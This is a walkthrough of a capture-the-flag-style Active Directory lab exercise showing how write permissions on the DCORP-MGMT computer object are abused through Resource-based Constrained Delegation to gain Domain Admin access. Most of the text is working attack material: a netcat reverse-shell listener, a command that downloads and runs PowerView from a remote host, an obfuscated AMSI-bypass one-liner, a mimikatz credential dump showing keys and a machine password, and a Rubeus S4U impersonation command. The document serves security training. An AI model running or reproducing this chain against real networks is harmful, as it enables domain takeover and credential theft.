17 - LO1️7️

Learning Object 17

Tasks

1 - Find a computer object in dcorp domain where we have Write permissions

2 - Abuse the Write permissions to access that computer as Domain Admin

Flag 28 [dcorp-dc] - Computer account on which ciadmin can configure Resource-based Constrained Delegation 🚩

Solutions

1 - Find a computer object in dcorp domain where we have Write permissions

Let's use PowerView from a PowerShell session started using Invisi-Shell to enumerate Write permissions for a user that we have compromised.

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Powerview.ps1
Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}

ObjectDN                : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : ListChildren, ReadProperty, GenericWrite
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-719815819-3726368948-3917688648-1121
IdentityReferenceName   : ciadmin
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN     : CN=ci admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass  : user

2 - Abuse the Write permissions to access that computer as Domain Admin

Recall that we compromised ciadmin from dcorp-ci (on learning object 5). We can either use the reverse shell we have on dcorp-ci as ciadmin or extract the credentials from dcorp-ci.

Let's use the reverse shell that we have and load PowerView there:

C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 1339
iex (iwr http://172.16.100.67/sbloggingbypass.txt -UseBasicParsing)
S`eT-It`em ( 'V'+'aR' +  'IA' + (("{1}{0}"-f'1','blE:')+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a'))  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.67/PowerView.ps1'))

Now, set RBCD on dcorp-mgmt for the student VMs. You may like to set it for all the student VMs in your lab instance so that your fellow students can also try it:

Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom 'dcorp-std867$' -Verbose

and check if RBCD is set correctly:

Get-DomainRBCD

Get AES keys of your student VM (as we configured RBCD for it above). Run the below command from an elevated shell:

C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe -args "sekurlsa::evasive-keys" "exit"

mimikatz(commandline) # sekurlsa::evasive-keys

Authentication Id : 0 ; 5060531 (00000000:004d37b3)
Session           : Interactive from 0
User Name         : student867
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 5/18/2025 10:07:04 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-20607

         * Username : student867
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
         * Key List :
           aes256_hmac       a5c82dbe35172fffbb2ac34c91637f7d7ca89dbdd1ce834ee5c167c3485675f1
           rc4_hmac_nt       320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_old      320e675610942d625c9a2aeaaf357b4a
           rc4_md4           320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_nt_exp   320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_old_exp  320e675610942d625c9a2aeaaf357b4a

Authentication Id : 0 ; 282875 (00000000:000450fb)
Session           : RemoteInteractive from 2
User Name         : student867
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 5/18/2025 3:18:24 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-20607

         * Username : student867
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
         * Key List :
           aes256_hmac       a5c82dbe35172fffbb2ac34c91637f7d7ca89dbdd1ce834ee5c167c3485675f1
           rc4_hmac_nt       320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_old      320e675610942d625c9a2aeaaf357b4a
           rc4_md4           320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_nt_exp   320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_old_exp  320e675610942d625c9a2aeaaf357b4a

Authentication Id : 0 ; 257517 (00000000:0003eded)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/18/2025 3:18:22 PM
SID               : S-1-5-90-0-2

         * Username : DCORP-STD867$
         * Domain   : dollarcorp.moneycorp.local
         * Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
         * Key List :
           aes256_hmac       74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
           aes128_hmac       ea00a74065da6eeb8059498838f3bbc1
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

Authentication Id : 0 ; 257479 (00000000:0003edc7)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/18/2025 3:18:22 PM
SID               : S-1-5-90-0-2

         * Username : DCORP-STD867$
         * Domain   : dollarcorp.moneycorp.local
         * Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
         * Key List :
           aes256_hmac       74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
           aes128_hmac       ea00a74065da6eeb8059498838f3bbc1
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

Authentication Id : 0 ; 256758 (00000000:0003eaf6)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 5/18/2025 3:18:22 PM
SID               : S-1-5-96-0-2

         * Username : DCORP-STD867$
         * Domain   : dollarcorp.moneycorp.local
         * Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
         * Key List :
           aes256_hmac       74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
           aes128_hmac       ea00a74065da6eeb8059498838f3bbc1
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

Authentication Id : 0 ; 51592 (00000000:0000c988)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/18/2025 3:16:25 PM
SID               : S-1-5-90-0-1

         * Username : DCORP-STD867$
         * Domain   : dollarcorp.moneycorp.local
         * Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
         * Key List :
           aes256_hmac       74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
           aes128_hmac       ea00a74065da6eeb8059498838f3bbc1
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

Authentication Id : 0 ; 51562 (00000000:0000c96a)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/18/2025 3:16:25 PM
SID               : S-1-5-90-0-1

         * Username : DCORP-STD867$
         * Domain   : dollarcorp.moneycorp.local
         * Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
         * Key List :
           aes256_hmac       74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
           aes128_hmac       ea00a74065da6eeb8059498838f3bbc1
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DCORP-STD867$
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 5/18/2025 3:16:24 PM
SID               : S-1-5-20

         * Username : dcorp-std867$
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
         * Key List :
           aes256_hmac       02698bbddb51903271ff8400c7ce6c83af2f638a0c450f8a18005160c8558f93
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

Authentication Id : 0 ; 27191 (00000000:00006a37)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 5/18/2025 3:16:24 PM
SID               : S-1-5-96-0-0

         * Username : DCORP-STD867$
         * Domain   : dollarcorp.moneycorp.local
         * Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
         * Key List :
           aes256_hmac       74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
           aes128_hmac       ea00a74065da6eeb8059498838f3bbc1
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

Authentication Id : 0 ; 4584063 (00000000:0045f27f)
Session           : Interactive from 0
User Name         : student867
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 5/18/2025 9:08:19 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-20607

         * Username : student867
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
         * Key List :
           aes256_hmac       a5c82dbe35172fffbb2ac34c91637f7d7ca89dbdd1ce834ee5c167c3485675f1
           rc4_hmac_nt       320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_old      320e675610942d625c9a2aeaaf357b4a
           rc4_md4           320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_nt_exp   320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_old_exp  320e675610942d625c9a2aeaaf357b4a

Authentication Id : 0 ; 282931 (00000000:00045133)
Session           : RemoteInteractive from 2
User Name         : student867
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 5/18/2025 3:18:24 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-20607

         * Username : student867
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
         * Key List :
           aes256_hmac       a5c82dbe35172fffbb2ac34c91637f7d7ca89dbdd1ce834ee5c167c3485675f1
           rc4_hmac_nt       320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_old      320e675610942d625c9a2aeaaf357b4a
           rc4_md4           320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_nt_exp   320e675610942d625c9a2aeaaf357b4a
           rc4_hmac_old_exp  320e675610942d625c9a2aeaaf357b4a

Authentication Id : 0 ; 27152 (00000000:00006a10)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 5/18/2025 3:16:24 PM
SID               : S-1-5-96-0-1

         * Username : DCORP-STD867$
         * Domain   : dollarcorp.moneycorp.local
         * Password : 3]t)Y2qUMjm-CrTLiEl2EOP_<Up6hdlO-/BirR:*E+/RnX"A)T*XJ4@w%,/(sp[_TnoJ0O[SeHHmz4.B<up%E-i6$K* 7<5A\,E(ol8&sO"Fbw55Q\odl)k/
         * Key List :
           aes256_hmac       74e40057f8889c233ae611dc3f7639e3e3a2fe0cccd22bba8b98ef59f87de08e
           aes128_hmac       ea00a74065da6eeb8059498838f3bbc1
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : DCORP-STD867$
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 5/18/2025 3:16:23 PM
SID               : S-1-5-18

         * Username : dcorp-std867$
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)
         * Key List :
           aes256_hmac       02698bbddb51903271ff8400c7ce6c83af2f638a0c450f8a18005160c8558f93
           rc4_hmac_nt       70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old      70bc24a10d8a3108876fc77b99c590ec
           rc4_md4           70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_nt_exp   70bc24a10d8a3108876fc77b99c590ec
           rc4_hmac_old_exp  70bc24a10d8a3108876fc77b99c590ec

mimikatz(commandline) # exit

With Rubeus, abuse the RBCD to access dcorp-mgmt as Domain Administrator - Administrator, considering dcorp-std867$:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-std867$ /aes256:02698bbddb51903271ff8400c7ce6c83af2f638a0c450f8a18005160c8558f93 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt

Check if we can access dcorp-mgmt:

winrs -r:dcorp-mgmt cmd
set username
set computername

Flag 28 [dcorp-dc] - Computer account on which ciadmin can configure Resource-based Constrained Delegation 🚩

ObjectDN                : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : ListChildren, ReadProperty, GenericWrite
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-719815819-3726368948-3917688648-1121
IdentityReferenceName   : ciadmin
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN     : CN=ci admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass  : user

DCORP-MGMT is the computer account on which ciadmin can configure Resource-based Constrained Delegation.